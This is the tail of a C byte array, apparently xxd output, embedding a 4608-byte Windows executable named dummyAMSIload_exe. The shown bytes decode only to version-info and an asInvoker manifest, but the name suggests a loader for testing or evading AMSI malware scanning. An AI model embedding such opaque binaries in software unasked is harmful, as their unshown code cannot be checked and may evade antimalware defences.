231 | 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 232 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x3f, 0x00, 0x00, 0x00, 233 | 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 234 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 235 | 0x44, 0x00, 0x00, 0x00, 0x01, 0x00, 0x56, 0x00, 0x61, 0x00, 0x72, 0x00, 236 | 0x46, 0x00, 0x69, 0x00, 0x6c, 0x00, 0x65, 0x00, 0x49, 0x00, 0x6e, 0x00, 237 | 0x66, 0x00, 0x6f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x04, 0x00, 238 | 0x00, 0x00, 0x54, 0x00, 0x72, 0x00, 0x61, 0x00, 0x6e, 0x00, 0x73, 0x00, 239 | 0x6c, 0x00, 0x61, 0x00, 0x74, 0x00, 0x69, 0x00, 0x6f, 0x00, 0x6e, 0x00, 240 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb0, 0x04, 0x7c, 0x01, 0x00, 0x00, 241 | 0x01, 0x00, 0x53, 0x00, 0x74, 0x00, 0x72, 0x00, 0x69, 0x00, 0x6e, 0x00, 242 | 0x67, 0x00, 0x46, 0x00, 0x69, 0x00, 0x6c, 0x00, 0x65, 0x00, 0x49, 0x00, 243 | 0x6e, 0x00, 0x66, 0x00, 0x6f, 0x00, 0x00, 0x00, 0x58, 0x01, 0x00, 0x00, 244 | 0x01, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 245 | 0x34, 0x00, 0x62, 0x00, 0x30, 0x00, 0x00, 0x00, 0x2c, 0x00, 0x02, 0x00, 246 | 0x01, 0x00, 0x46, 0x00, 0x69, 0x00, 0x6c, 0x00, 0x65, 0x00, 0x44, 0x00, 247 | 0x65, 0x00, 0x73, 0x00, 0x63, 0x00, 0x72, 0x00, 0x69, 0x00, 0x70, 0x00, 248 | 0x74, 0x00, 0x69, 0x00, 0x6f, 0x00, 0x6e, 0x00, 0x00, 0x00, 0x00, 0x00, 249 | 0x20, 0x00, 0x00, 0x00, 0x30, 0x00, 0x08, 0x00, 0x01, 0x00, 0x46, 0x00, 250 | 0x69, 0x00, 0x6c, 0x00, 0x65, 0x00, 0x56, 0x00, 0x65, 0x00, 0x72, 0x00, 251 | 0x73, 0x00, 0x69, 0x00, 0x6f, 0x00, 0x6e, 0x00, 0x00, 0x00, 0x00, 0x00, 252 | 0x30, 0x00, 0x2e, 0x00, 0x30, 0x00, 0x2e, 0x00, 0x30, 0x00, 0x2e, 0x00, 253 | 0x30, 0x00, 0x00, 0x00, 0x24, 0x00, 0x02, 0x00, 0x01, 0x00, 0x49, 0x00, 254 | 0x6e, 0x00, 0x74, 0x00, 0x65, 0x00, 0x72, 0x00, 0x6e, 0x00, 0x61, 0x00, 255 | 0x6c, 0x00, 0x4e, 0x00, 0x61, 0x00, 0x6d, 0x00, 0x65, 0x00, 0x00, 0x00, 256 | 0x3f, 0x00, 0x00, 0x00, 0x28, 0x00, 0x02, 0x00, 0x01, 0x00, 0x4c, 0x00, 257 | 0x65, 0x00, 0x67, 0x00, 0x61, 0x00, 0x6c, 0x00, 0x43, 0x00, 0x6f, 0x00, 258 | 0x70, 0x00, 0x79, 0x00, 0x72, 0x00, 0x69, 0x00, 0x67, 0x00, 0x68, 0x00, 259 | 0x74, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x2c, 0x00, 0x02, 0x00, 260 | 0x01, 0x00, 0x4f, 0x00, 0x72, 0x00, 0x69, 0x00, 0x67, 0x00, 0x69, 0x00, 261 | 0x6e, 0x00, 0x61, 0x00, 0x6c, 0x00, 0x46, 0x00, 0x69, 0x00, 0x6c, 0x00, 262 | 0x65, 0x00, 0x6e, 0x00, 0x61, 0x00, 0x6d, 0x00, 0x65, 0x00, 0x00, 0x00, 263 | 0x3f, 0x00, 0x00, 0x00, 0x34, 0x00, 0x08, 0x00, 0x01, 0x00, 0x50, 0x00, 264 | 0x72, 0x00, 0x6f, 0x00, 0x64, 0x00, 0x75, 0x00, 0x63, 0x00, 0x74, 0x00, 265 | 0x56, 0x00, 0x65, 0x00, 0x72, 0x00, 0x73, 0x00, 0x69, 0x00, 0x6f, 0x00, 266 | 0x6e, 0x00, 0x00, 0x00, 0x30, 0x00, 0x2e, 0x00, 0x30, 0x00, 0x2e, 0x00, 267 | 0x30, 0x00, 0x2e, 0x00, 0x30, 0x00, 0x00, 0x00, 0x38, 0x00, 0x08, 0x00, 268 | 0x01, 0x00, 0x41, 0x00, 0x73, 0x00, 0x73, 0x00, 0x65, 0x00, 0x6d, 0x00, 269 | 0x62, 0x00, 0x6c, 0x00, 0x79, 0x00, 0x20, 0x00, 0x56, 0x00, 0x65, 0x00, 270 | 0x72, 0x00, 0x73, 0x00, 0x69, 0x00, 0x6f, 0x00, 0x6e, 0x00, 0x00, 0x00, 271 | 0x30, 0x00, 0x2e, 0x00, 0x30, 0x00, 0x2e, 0x00, 0x30, 0x00, 0x2e, 0x00, 272 | 0x30, 0x00, 0x00, 0x00, 0xbc, 0x42, 0x00, 0x00, 0xea, 0x01, 0x00, 0x00, 273 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xef, 0xbb, 0xbf, 0x3c, 274 | 0x3f, 0x78, 0x6d, 0x6c, 0x20, 0x76, 0x65, 0x72, 0x73, 0x69, 0x6f, 0x6e, 275 | 0x3d, 0x22, 0x31, 0x2e, 0x30, 0x22, 0x20, 0x65, 0x6e, 0x63, 0x6f, 0x64, 276 | 0x69, 0x6e, 0x67, 0x3d, 0x22, 0x55, 0x54, 0x46, 0x2d, 0x38, 0x22, 0x20, 277 | 0x73, 0x74, 0x61, 0x6e, 0x64, 0x61, 0x6c, 0x6f, 0x6e, 0x65, 0x3d, 0x22, 278 | 0x79, 0x65, 0x73, 0x22, 0x3f, 0x3e, 0x0d, 0x0a, 0x0d, 0x0a, 0x3c, 0x61, 279 | 0x73, 0x73, 0x65, 0x6d, 0x62, 0x6c, 0x79, 0x20, 0x78, 0x6d, 0x6c, 0x6e, 280 | 0x73, 0x3d, 0x22, 0x75, 0x72, 0x6e, 0x3a, 0x73, 0x63, 0x68, 0x65, 0x6d, 281 | 0x61, 0x73, 0x2d, 0x6d, 0x69, 0x63, 0x72, 0x6f, 0x73, 0x6f, 0x66, 0x74, 282 | 0x2d, 0x63, 0x6f, 0x6d, 0x3a, 0x61, 0x73, 0x6d, 0x2e, 0x76, 0x31, 0x22, 283 | 0x20, 0x6d, 0x61, 0x6e, 0x69, 0x66, 0x65, 0x73, 0x74, 0x56, 0x65, 0x72, 284 | 0x73, 0x69, 0x6f, 0x6e, 0x3d, 0x22, 0x31, 0x2e, 0x30, 0x22, 0x3e, 0x0d, 285 | 0x0a, 0x20, 0x20, 0x3c, 0x61, 0x73, 0x73, 0x65, 0x6d, 0x62, 0x6c, 0x79, 286 | 0x49, 0x64, 0x65, 0x6e, 0x74, 0x69, 0x74, 0x79, 0x20, 0x76, 0x65, 0x72, 287 | 0x73, 0x69, 0x6f, 0x6e, 0x3d, 0x22, 0x31, 0x2e, 0x30, 0x2e, 0x30, 0x2e, 288 | 0x30, 0x22, 0x20, 0x6e, 0x61, 0x6d, 0x65, 0x3d, 0x22, 0x4d, 0x79, 0x41, 289 | 0x70, 0x70, 0x6c, 0x69, 0x63, 0x61, 0x74, 0x69, 0x6f, 0x6e, 0x2e, 0x61, 290 | 0x70, 0x70, 0x22, 0x2f, 0x3e, 0x0d, 0x0a, 0x20, 0x20, 0x3c, 0x74, 0x72, 291 | 0x75, 0x73, 0x74, 0x49, 0x6e, 0x66, 0x6f, 0x20, 0x78, 0x6d, 0x6c, 0x6e, 292 | 0x73, 0x3d, 0x22, 0x75, 0x72, 0x6e, 0x3a, 0x73, 0x63, 0x68, 0x65, 0x6d, 293 | 0x61, 0x73, 0x2d, 0x6d, 0x69, 0x63, 0x72, 0x6f, 0x73, 0x6f, 0x66, 0x74, 294 | 0x2d, 0x63, 0x6f, 0x6d, 0x3a, 0x61, 0x73, 0x6d, 0x2e, 0x76, 0x32, 0x22, 295 | 0x3e, 0x0d, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x3c, 0x73, 0x65, 0x63, 0x75, 296 | 0x72, 0x69, 0x74, 0x79, 0x3e, 0x0d, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 297 | 0x20, 0x3c, 0x72, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x65, 0x64, 0x50, 298 | 0x72, 0x69, 0x76, 0x69, 0x6c, 0x65, 0x67, 0x65, 0x73, 0x20, 0x78, 0x6d, 299 | 0x6c, 0x6e, 0x73, 0x3d, 0x22, 0x75, 0x72, 0x6e, 0x3a, 0x73, 0x63, 0x68, 300 | 0x65, 0x6d, 0x61, 0x73, 0x2d, 0x6d, 0x69, 0x63, 0x72, 0x6f, 0x73, 0x6f, 301 | 0x66, 0x74, 0x2d, 0x63, 0x6f, 0x6d, 0x3a, 0x61, 0x73, 0x6d, 0x2e, 0x76, 302 | 0x33, 0x22, 0x3e, 0x0d, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 303 | 0x20, 0x3c, 0x72, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x65, 0x64, 0x45, 304 | 0x78, 0x65, 0x63, 0x75, 0x74, 0x69, 0x6f, 0x6e, 0x4c, 0x65, 0x76, 0x65, 305 | 0x6c, 0x20, 0x6c, 0x65, 0x76, 0x65, 0x6c, 0x3d, 0x22, 0x61, 0x73, 0x49, 306 | 0x6e, 0x76, 0x6f, 0x6b, 0x65, 0x72, 0x22, 0x20, 0x75, 0x69, 0x41, 0x63, 307 | 0x63, 0x65, 0x73, 0x73, 0x3d, 0x22, 0x66, 0x61, 0x6c, 0x73, 0x65, 0x22, 308 | 0x2f, 0x3e, 0x0d, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3c, 0x2f, 309 | 0x72, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x65, 0x64, 0x50, 0x72, 0x69, 310 | 0x76, 0x69, 0x6c, 0x65, 0x67, 0x65, 0x73, 0x3e, 0x0d, 0x0a, 0x20, 0x20, 311 | 0x20, 0x20, 0x3c, 0x2f, 0x73, 0x65, 0x63, 0x75, 0x72, 0x69, 0x74, 0x79, 312 | 0x3e, 0x0d, 0x0a, 0x20, 0x20, 0x3c, 0x2f, 0x74, 0x72, 0x75, 0x73, 0x74, 313 | 0x49, 0x6e, 0x66, 0x6f, 0x3e, 0x0d, 0x0a, 0x3c, 0x2f, 0x61, 0x73, 0x73, 314 | 0x65, 0x6d, 0x62, 0x6c, 0x79, 0x3e, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 315 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 316 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 317 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 318 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 319 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 320 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 321 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 322 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 323 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 324 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 325 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 326 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 327 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 328 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 329 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 330 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 331 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 332 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 333 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 334 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 335 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 336 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 337 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 338 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 339 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 340 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 341 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 342 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 343 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x0c, 0x00, 0x00, 0x00, 344 | 0x24, 0x37, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 345 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 346 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 347 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 348 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 349 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 350 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 351 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 352 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 353 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 354 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 355 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 356 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 357 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 358 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 359 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 360 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 361 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 362 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 363 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 364 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 365 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 366 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 367 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 368 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 369 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 370 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 371 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 372 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 373 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 374 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 375 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 376 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 377 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 378 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 379 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 380 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 381 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 382 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 383 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 384 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 385 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 386 | }; 387 | unsigned int dummyAMSIload_exe_len = 4608; 388 | --------------------------------------------------------------------------------